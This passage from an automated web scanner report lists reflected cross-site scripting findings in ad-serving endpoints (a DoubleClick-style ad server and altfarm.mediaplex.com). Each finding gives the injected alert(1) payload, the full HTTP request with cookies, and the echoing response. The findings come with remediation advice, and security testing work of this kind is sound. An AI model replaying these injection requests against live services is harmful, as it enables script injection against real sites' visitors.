Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46242"-alert(1)-"4c02dbc8d53 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e346242"-alert(1)-"4c02dbc8d53&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6428

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
1%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e346242"-alert(1)-"4c02dbc8d53&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "nev
...[SNIP]...

4.83. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [sn2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e338'-alert(1)-'16742ae9f75 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e31e338'-alert(1)-'16742ae9f75&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6426

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
1%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e31e338'-alert(1)-'16742ae9f75&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\">
...[SNIP]...

4.84. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [snr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f835"-alert(1)-"d4361fd75fc was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick3f835"-alert(1)-"d4361fd75fc&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6426

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick3f835"-alert(1)-"d4361fd75fc&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var open
...[SNIP]...

4.85. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [snr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25932'-alert(1)-'7a4e7340a55 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick25932'-alert(1)-'7a4e7340a55&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6425

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick25932'-alert(1)-'7a4e7340a55&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\">
...[SNIP]...

4.86. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [snx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df5cf"-alert(1)-"cabd323b909 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073df5cf"-alert(1)-"cabd323b909&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6425

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073df5cf"-alert(1)-"cabd323b909&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false
...[SNIP]...

4.87. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [snx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36d88'-alert(1)-'b2fe71d3c54 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=128980207336d88'-alert(1)-'b2fe71d3c54&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6426

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=128980207336d88'-alert(1)-'b2fe71d3c54&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\">
...[SNIP]...

4.88. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2742c'-alert(1)-'b4a024bcc9a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto2742c'-alert(1)-'b4a024bcc9a&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6426

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
8/3a53/7/10c/%2a/s%3B231651615%3B2-0%3B0%3B55718902%3B4252-336/280%3B39025850/39043607/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto2742c'-alert(1)-'b4a024bcc9a&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.i
...[SNIP]...

4.89. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b2d8"-alert(1)-"096a80d911b was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto8b2d8"-alert(1)-"096a80d911b&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6428

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:06:42 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
8/3a53/7/10c/%2a/x%3B231651615%3B3-0%3B0%3B55718902%3B4252-336/280%3B39025852/39043609/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto8b2d8"-alert(1)-"096a80d911b&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.i
...[SNIP]...

4.90. http://altfarm.mediaplex.com/ad/js/11321-114995-1358-11 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/11321-114995-1358-11

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d70c0'-alert(1)-'8fa323c2db8 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/11321-114995-1358-11?mpt=2010.11.15.07.15.19d70c0'-alert(1)-'8fa323c2db8&mpvc= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: altfarm.mediaplex.com
Cookie: svid=804356890302; mojo3=11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 260
Date: Mon, 15 Nov 2010 07:20:22 GMT

document.write('<a target="_blank" href="http://altfarm.mediaplex.com/ad/ck/11321-114995-1358-11?mpt=2010.11.15.07.15.19d70c0'-alert(1)-'8fa323c2db8&mpvc="><img ismap border=0 src="http://img-cdn.medi
...[SNIP]...

4.91. http://altfarm.mediaplex.com/ad/js/11321-114995-1358-11 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/11321-114995-1358-11

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88c62'%3balert(1)//0a40d0aebfa was submitted in the mpvc parameter. This input was echoed as 88c62';alert(1)//0a40d0aebfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/11321-114995-1358-11?mpt=2010.11.15.07.15.19&mpvc=88c62'%3balert(1)//0a40d0aebfa HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: altfarm.mediaplex.com
Cookie: svid=804356890302; mojo3=11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 254
Date: Mon, 15 Nov 2010 07:20:24 GMT

document.write('<a target="_blank" href="88c62';alert(1)//0a40d0aebfahttp://altfarm.mediaplex.com/ad/ck/11321-114995-1358-11?mpt=2010.11.15.07.15.19"><img ismap border=0 src="http://img-cdn.mediaplex.
...[SNIP]...

4.92. http://altfarm.mediaplex.com/ad/js/11321-114995-1358-11 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/11321-114995-1358-11

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 158b3'%3balert(1)//1fd61cf7f60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 158b3';alert(1)//1fd61cf7f60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/11321-114995-1358-11?mpt=2010.11.15.07.15.19&mpvc=&158b3'%3balert(1)//1fd61cf7f60=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: altfarm.mediaplex.com
Cookie: svid=804356890302; mojo3=11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 257
Date: Mon, 15 Nov 2010 07:20:27 GMT

document.write('<a target="_blank" href="&158b3';alert(1)//1fd61cf7f60=1http://altfarm.mediaplex.com/ad/ck/11321-114995-1358-11?mpt=2010.11.15.07.15.19"><img ismap border=0 src="http://img-cdn.mediapl
...[SNIP]...

4.93. http://altfarm.mediaplex.com/ad/js/11321-114995-1358-12 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/11321-114995-1358-12

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db8f3'-alert(1)-'7aa45b5fe58 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/11321-114995-1358-12?mpt=2010.11.15.07.15.19db8f3'-alert(1)-'7aa45b5fe58&mpvc= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: altfarm.mediaplex.com
Cookie: svid=804356890302; mojo3=14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; expires=Thu, 15-Nov-2012 6:11:45 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 259
Date: Mon, 15 Nov 2010 07:20:22 GMT

document.write('<a target="_blank" href="http://altfarm.mediaplex.com/ad/ck/11321-114995-1358-12?mpt=2010.11.15.07.15.19db8f3'-alert(1)-'7aa45b5fe58&mpvc="><img ismap border=0 src="http://img-cdn.medi
...[SNIP]...

4.94. http://altfarm.mediaplex.com/ad/js/11321-114995-1358-12 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/11321-114995-1358-12

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0f3e'%3balert(1)//2351d3570d4 was submitted in the mpvc parameter. This input was echoed as b0f3e';alert(1)//2351d3570d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/11321-114995-1358-12?mpt=2010.11.15.07.15.19&mpvc=b0f3e'%3balert(1)//2351d3570d4 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: altfarm.mediaplex.com
Cookie: svid=804356890302; mojo3=14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
